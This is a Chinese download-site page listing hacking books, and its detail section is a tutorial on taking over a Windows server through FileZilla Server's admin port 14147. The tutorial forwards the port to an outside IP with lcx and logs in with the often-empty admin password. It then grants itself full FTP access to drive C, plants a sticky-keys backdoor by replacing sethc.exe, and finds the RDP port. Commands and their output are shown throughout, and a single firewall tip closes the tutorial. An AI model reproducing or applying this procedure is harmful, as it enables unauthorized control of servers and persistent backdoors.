冰河的滲透實(shí)戰(zhàn)筆記 中文pdf完整版
18.8MB / 12-05
API安全實(shí)戰(zhàn)(尼爾·馬登) 中文完整版
89.6MB / 11-29
網(wǎng)絡(luò)安全必讀書:Web Hacking 101 (中文2023版) 完整版PDF
2.25MB / 02-03
灰帽黑客(第5版):正義黑客的道德規(guī)范、滲透測(cè)試、攻擊方法和漏洞
95.6MB / 12-28
Web應(yīng)用程序安全手冊(cè) pdf格式
500KB / 12-27
黑客攻防與無線安全從新手到高手(超值版) 中文PDF完整版
62.2MB / 10-13
藍(lán)隊(duì)面試題整理(hw防守方面試題整理) 完整版pdf
2.15MB / 08-02
CTF競(jìng)賽100題 word完整版
5.88MB / 12-23
游戲安全:手游安全技術(shù)入門 完整版PDF
50.6MB / 01-10
Web滲透測(cè)試實(shí)戰(zhàn) (整個(gè)全流程) 完整版pdf
779KB / 11-02
-
-
-
黑客七種武器一百零八招 PDF版 網(wǎng)絡(luò)安全 / 15MB
-
24小時(shí)學(xué)會(huì)黑客攻防 PDF掃描版[30.26M] 網(wǎng)絡(luò)安全 / 30.26MB
-
黑匣子思維:我們?nèi)绾胃硇缘胤稿e(cuò) 高清pdf版 含epub+mobi+azw3 網(wǎng)絡(luò)安全 / 5.85MB
-
游戲安全:手游安全技術(shù)入門 完整版PDF 網(wǎng)絡(luò)安全 / 50.6MB
-
-
網(wǎng)絡(luò)安全必讀書:Web Hacking 101 (中文2023版) 完整版PDF 網(wǎng)絡(luò)安全 / 2.25MB
-
灰帽黑客(第5版):正義黑客的道德規(guī)范、滲透測(cè)試、攻擊方法和漏洞 網(wǎng)絡(luò)安全 / 95.6MB
-
詳情介紹
這里為大家分享一下FileZilla Server 利用14147端口提權(quán)視頻教程,這樣對(duì)于防御就有了個(gè)不錯(cuò)的思路,最后對(duì)給大家一個(gè)預(yù)防思路啊。
做個(gè)教程投稿,不知道有沒有獎(jiǎng)勵(lì)~~
開了有3306,說明有root,不過我試了root賬戶被降權(quán)了,也就沒法利用了,
所以利用14147提權(quán),
用lcx端口轉(zhuǎn)發(fā)工具,把14147端口轉(zhuǎn)發(fā)到我們本機(jī),
shell上運(yùn)行D:\RECYCLER\lcx.exe -slave 42.239.18.58 327 127.0.0.1 14147
這樣把14147轉(zhuǎn)發(fā)到我們本機(jī)的327端口上,
先本機(jī)監(jiān)聽,本機(jī)運(yùn)行l(wèi)cx -listen 327 3333
是把327轉(zhuǎn)發(fā)到3333,
現(xiàn)在在shell運(yùn)行,
[+] Accept a Client on port 327 from 103.31.75.78 .....
[+] Waiting another Client on port:3333....
OK,然后我們本機(jī)下載FileZilla Server這個(gè)軟件,來連接登錄上去,
端口是3333,管理密碼一般都是空,
已連接, 等待認(rèn)證
協(xié)議警告: 服務(wù)器版本不匹配: 服務(wù)器版本為 0.9.51.32, 管理界面版本為 0.9.65.0
協(xié)議錯(cuò)誤: 協(xié)議版本不匹配: 服務(wù)器協(xié)議版本為 0.1.11.0, 管理界面協(xié)議版本為 0.1.13.0
出現(xiàn)這個(gè)提示,說明版本不匹配,怎么辦呢,他這個(gè)版本如果是老版本,網(wǎng)上還難找,
一般軟件安裝目錄,是有權(quán)限瀏覽的,然后就能下載咯,我們?cè)谒?wù)器上下載他的,就和他的版本一樣了,
D盤沒有,
對(duì)路徑“C:\”的訪問被拒絕。
訪問不了C盤根目錄,我們直接訪問C:\Program Files\
看到?jīng)],F(xiàn)ileZilla Server,進(jìn)去,下載里面的文件到本機(jī),是可以下載的,我已經(jīng)下載過了,
已連接,正在等待驗(yàn)證
已登錄
然后點(diǎn)用戶,添加一個(gè)自己的,密碼勾上設(shè)置個(gè)密碼,也可以不設(shè)置就是空密碼,
然后點(diǎn)共享文件夾,添加一個(gè)C盤,右側(cè)的權(quán)限都勾上,然后保存,
現(xiàn)在用FTP軟件連接,端口一般是21,點(diǎn)編輯,設(shè)置這里可以看到端口,
現(xiàn)在C盤完全控制,上shift后門咯,
替換掉下面這兩個(gè)文件夾的sethc文件,
C:\windows\system32\sethc.exe
C:\windows\system32\dllcache\sethc.exe
我用cmd替換,倆都換好了,現(xiàn)在找遠(yuǎn)程端口,
查服務(wù)tasklist /svc
svchost.exe 1628 TermService
TermService 的PID是1628,現(xiàn)在找PID 1628 對(duì)應(yīng)的端口,就是遠(yuǎn)程端口咯,
查端口netstat -ano
TCP 0.0.0.0:7755 0.0.0.0:0 LISTENING 1628
端口是7755
OK服務(wù)器到手。
教程到此結(jié)束。
腳本之家小編給出的防御方法:通過端口策略或防火墻,禁止本地的14147連接任意ip的任意端口即可。
下載地址
人氣書籍
白帽子講Web安全 高清PDF掃描版本[200m]
Metasploit滲透測(cè)試魔鬼訓(xùn)練營 (諸葛建偉等) 高清PDF掃描版 164M
比較詳細(xì)入侵網(wǎng)站后臺(tái)拿SHELL視頻教程 嬰兒版
黑客攻防入門與進(jìn)階 中文 PDF清晰版
24小時(shí)學(xué)會(huì)黑客攻防 PDF掃描版[30.26M]
精通腳本黑客 高清pdf掃描版[22MB]
黑客攻防技術(shù)寶典:Web實(shí)戰(zhàn)篇 PDF掃描版[55MB]
Windows內(nèi)核安全與驅(qū)動(dòng)開發(fā) (譚文等著) 中文pdf掃描版[203MB]
寒江獨(dú)釣 Windows內(nèi)核安全編程 譚文等著 中文 PDF版 [118M]
安全技術(shù)大系:惡意代碼分析實(shí)戰(zhàn) 中文pdf掃描版[108MB]
下載聲明
☉ 解壓密碼:www.dbjr.com.cn 就是本站主域名,希望大家看清楚,[ 分享碼的獲取方法 ]可以參考這篇文章
☉ 推薦使用 [ 迅雷 ] 下載,使用 [ WinRAR v5 ] 以上版本解壓本站軟件。
☉ 如果這個(gè)軟件總是不能下載的請(qǐng)?jiān)谠u(píng)論中留言,我們會(huì)盡快修復(fù),謝謝!
☉ 下載本站資源,如果服務(wù)器暫不能下載請(qǐng)過一段時(shí)間重試!或者多試試幾個(gè)下載地址
☉ 如果遇到什么問題,請(qǐng)?jiān)u論留言,我們定會(huì)解決問題,謝謝大家支持!
☉ 本站提供的一些商業(yè)軟件是供學(xué)習(xí)研究之用,如用于商業(yè)用途,請(qǐng)購買正版。
☉ 本站提供的FileZilla Server 利用14147端口提權(quán)視頻教程資源來源互聯(lián)網(wǎng),版權(quán)歸該下載資源的合法擁有者所有。